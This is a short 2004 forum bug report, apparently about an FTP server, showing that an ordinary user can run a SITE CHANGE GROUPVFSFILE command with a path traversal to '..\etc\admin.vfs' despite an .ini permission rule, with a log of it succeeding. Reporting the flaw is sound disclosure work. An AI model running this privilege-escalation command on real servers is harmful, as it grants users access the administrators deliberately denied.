12-03-2004, 08:32 PM
darko
Member
 
Join Date: May 2004
Posts: 74
Bug with big security risk - GROUPVFSFILE

Everyone can execute, for example:
site change AnyGrp GROUPVFSFILE ..\etc\admin.vfs

although in the .ini it's being disallowed:

Code:
[Change-Permissions]
groupvfsfile = M

Example logged in as normal user (no +M flag):

[code]
[R] (02:15:54) SITE CHANGE AnyGrp GROUPVFSFILE ..\etc\admin.vfs
[R] (02:15:55) 200 CHANGE Command successful.
[R] (02:16:15) CWD .
[/code]


This is pretty bad :<